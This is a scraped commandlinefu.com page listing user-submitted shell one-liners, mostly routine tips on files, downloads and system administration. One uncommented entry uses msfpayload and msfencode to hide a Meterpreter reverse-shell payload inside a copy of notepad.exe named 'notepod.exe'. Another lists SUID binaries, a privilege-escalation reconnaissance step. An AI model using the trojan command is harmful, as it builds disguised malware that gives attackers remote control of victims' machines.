What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.

Get involved!

You can sign in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes respectively - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

May 19, 2015 - A Look At The New Commandlinefu
I've put together a short writeup on what kind of newness you can expect from the next iteration of clfu. Check it out here.
March 2, 2015 - New Management
I'm Jon, I'll be maintaining and improving clfu. Thanks to David for building such a great resource!

Maintained by Jon H.

Site originally by David Winterbottom (user root).

Psst. Open beta.

Wow, didn't really expect you to read this far down. The latest iteration of the site is in open beta. It's a gentle open beta, not in prime time just yet. It's being hosted over at UpGuard (link) and you are more than welcome to give it a shot. A couple of things:

  • » The open beta is running a copy of the database that will not carry over to the final version. Don't post anything you don't mind losing.
  • » If you wish to use your user account, you will probably need to reset your password.
Your feedback is appreciated via the form on the beta page. Thanks! -Jon & CLFU Team

Terminal - All commands - 12,388 results
cat search_items.txt | while read i; do surfraw google -browser=firefox $i; done
2011-05-12 09:27:08
User: bubo
Functions: cat read

Tired of opening tabs and filling in search forms by hand? Just pipe the search terms you need into this surfraw loop. You can use any browser you have installed, but a graphical browser with a tabbed interface will come in handy.
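A minimal sketch of the same while-read pattern, with echo standing in for the surfraw call (the sample search_items.txt is created on the spot):

```shell
# build a sample list of search terms
printf '%s\n' 'linux kernel' 'bash arrays' > search_items.txt

# feed each line to a command; echo stands in for 'surfraw google -browser=firefox'
cat search_items.txt | while read -r i; do
    echo "searching for: $i"
done
```

Note that $i is unquoted in the original on purpose: surfraw joins its arguments into one query, so multi-word lines still work.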


wget --no-check-certificate https://code.google.com/p/msysgit/downloads/list -O - 2>nul | sed -n "0,/.*\(\/\/msysgit.googlecode.com\/files\/Git-.*\.exe\).*/s//http:\1/p" | wget -i - -O Git-Latest.exe
2012-11-14 08:17:50
User: michfield
Functions: sed wget
Tags: git windows wget

This command should be copy-pasted into Windows, but a very similar one will work on Linux.

It uses wget and sed.
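The sed stage just extracts the first protocol-relative download URL from the page's HTML and prefixes the scheme. A toy reproduction with a made-up page fragment:

```shell
# hypothetical fragment of the downloads page
html='<a href="//msysgit.googlecode.com/files/Git-1.8.0-preview.exe">download</a>'

# pull out the protocol-relative URL and prepend http:
url=$(printf '%s\n' "$html" | sed -n 's|.*\(//msysgit.googlecode.com/files/Git-[^"]*\.exe\).*|http:\1|p')
echo "$url"
```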

cd -
perl -e 'printf "%vd\n",pack "N",rand 256**4'
sshpass -p 't@uyM59bQ' ssh username@server.example.com
2012-02-13 09:51:41
User: djyoda
Functions: ssh

You can use the sshpass command to provide a password for ssh-based logins. sshpass is a utility designed for running ssh in the mode referred to as "keyboard-interactive" password authentication, but non-interactively.

mkdir Epub ; mv -v --target-directory=Epub $(fgrep -lr epub *)
for f in $(ls *.xml.skippy); do mv $f `echo $f | sed 's|.skippy||'`; done
2009-11-19 21:36:26
User: argherna
Functions: ls mv sed
Tags: sed ls mv for

For this example, all files in the current directory that end in '.xml.skippy' will have the '.skippy' removed from their names.
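The same rename can be done with shell parameter expansion instead of sed, which avoids a subshell per file and, with quoting, survives unusual filenames; a sketch:

```shell
# sample files (hypothetical names)
touch a.xml.skippy b.xml.skippy

# ${f%.skippy} strips the trailing '.skippy'
for f in *.xml.skippy; do
    mv "$f" "${f%.skippy}"
done
```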

exim -bV
VAR=$(head -5)
2014-04-05 13:45:18
User: rodolfoap
Functions: head
Tags: read stdin head

Reads n lines from stdin and puts the contents in a variable. Yes, I know the read command and its options, but I find this more logical, even for one line.
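For instance, capturing the first five lines of a generated sample file (command substitution trims the trailing newline):

```shell
# ten-line sample file
seq 1 10 > sample.txt

# grab the first five lines into a variable
VAR=$(head -5 < sample.txt)
echo "$VAR"
```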

echo -n '#!'$(which awk)
awk '/^md/ {printf "%s: ", $1}; /blocks/ {print $NF}' </proc/mdstat
wget -k $URL
2010-08-21 17:39:53
User: minnmass
Functions: wget
Tags: wget

The "-k" flag will tell wget to convert links for local browsing; it works with mirroring (ie with "-r") or single-file downloads.

find . -exec grep "test" '{}' /dev/null \; -print
apt-cache search perl | grep module | awk '{print $1;}' | xargs sudo apt-get install -y

I used this to mass install a lot of perl stuff. Threw it together because I was feeling *especially* lazy. The 'perl' and the 'module' can be replaced with whatever you like.

find <dir> -printf '%p : %A@\n' | awk -F' : ' -v t=<time in epoch> '$2 < t {print $1}' | xargs rm --verbose -fr
2009-11-20 16:31:58
User: angleto
Functions: awk find rm xargs

Removes files with an access time older than a given date.

If you want to remove files with a given modification time, replace %A@ with %T@. Use %C@ for the status-change time.

The time is expressed in epoch seconds, but it is easy to convert from any other format (e.g. with date +%s).
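A filled-in sketch of the same pipeline; the sandbox directory, the 7-day cutoff, and the use of GNU date to compute epoch seconds are all example choices (and, like the original, it assumes paths without spaces):

```shell
# sandbox with one stale and one fresh file
demo=$(mktemp -d)
touch -a -d '10 days ago' "$demo/old.log"
touch "$demo/fresh.log"

# cutoff in epoch seconds: 7 days ago
cutoff=$(date -d '7 days ago' +%s)

# print path and access time, keep paths older than the cutoff, remove them
find "$demo" -type f -printf '%p : %A@\n' \
  | awk -F' : ' -v t="$cutoff" '$2 < t {print $1}' \
  | xargs -r rm --verbose -f
```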

dir='path to file'; tar cpf - "$dir" | pv -s $(du -sb "$dir" | awk '{print $1}') | tar xpf - -C /other/path
2010-01-19 19:05:45
User: starchox
Functions: awk dir du tar
Tags: copy tar cp

This may seem like a long command, but it is great for making sure all file permissions are kept intact. What it does is stream the files in a sub-shell and then untar them in the target directory. Please note that the -z option should not be used for local files: there is no performance gain, and the compression overhead (CPU) will actually slow down the copy.

You can also keep it simple with the following, but you lose the progress info:

cp -rpf /some/directory /other/path
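Stripped of the pv progress stage, the same stream copy looks like this (paths are throwaway examples created for the sketch):

```shell
# example source and destination
src=$(mktemp -d); dest=$(mktemp -d)
mkdir -p "$src/sub"
echo hello > "$src/sub/file.txt"
chmod 640 "$src/sub/file.txt"

# stream the tree through a pipe; -p preserves permissions on both ends
tar cpf - -C "$src" . | tar xpf - -C "$dest"
```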
python -c "from uuid import UUID; print(UUID('63b726a0-4c59-45e4-af65-bced5d268456').hex)"
2011-11-20 10:35:44
User: mackaz
Functions: python

Removes the dashes, and also validates that it's a valid UUID (in contrast to simple string replacement).
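When validation doesn't matter, plain string replacement does the same job straight from the shell; a sketch with tr:

```shell
uuid='63b726a0-4c59-45e4-af65-bced5d268456'

# tr simply deletes the dashes; unlike the Python version, nothing is validated
hex=$(printf '%s' "$uuid" | tr -d '-')
echo "$hex"
```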

find . -type f -exec grep -l "some string" {} \;
find -amin +[n] -delete
2009-11-20 17:15:28
User: TeacherTiger
Functions: find

Deletes files last accessed more than "n" minutes ago. Note the plus sign before the n is important and means "greater than n". This is more precise than -atime, since -atime is specified in units of days. Note that you can use amin/atime, mmin/mtime, and cmin/ctime for access, modification, and status-change times, respectively. Also, using -delete is faster than piping to xargs, since no piping is needed.
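A sketch in a throwaway directory, backdating one file's access time with GNU touch so that -amin +60 catches it:

```shell
dir=$(mktemp -d)
touch "$dir/fresh"
touch -a -d '2 hours ago' "$dir/stale"

# delete files last accessed more than 60 minutes ago
find "$dir" -type f -amin +60 -delete
```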

find -name "*.php" -exec php -l {} \; | grep -v "No syntax errors"
2010-07-23 08:09:47
User: ejrowley
Functions: find grep

If your site is struck by the white screen of death, you can find the syntax error quickly with PHP's linter.

echo !$
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=8000 R | msfencode -c 5 -t exe -x ~/notepad.exe -k -o notepod.exe
find / -xdev \( -perm -4000 \) -type f -print0 | xargs -0 ls -l
jkhgkjh; until [[ $? -eq 0 ]]; do YOURCOMMAND; done
2014-04-11 08:19:15
User: moiefu

You want bash to keep running the command until it is successful (until the exit code is 0). Give a dummy command to set the exit code to 1, then keep running your command until it exits cleanly.
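A self-contained sketch of the pattern: a stand-in function fails twice before succeeding, and the loop retries until the exit code is 0 (the counter is just scaffolding for the demo):

```shell
# demo command: fails until its third call
tries=0
attempt() {
    tries=$((tries + 1))
    [ "$tries" -ge 3 ]
}

# seed a failing exit status, then retry until the command succeeds
false
until [ "$?" -eq 0 ]; do attempt; done
echo "succeeded after $tries tries"
```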

acpi | cut -d '%' -f1 | cut -d ',' -f2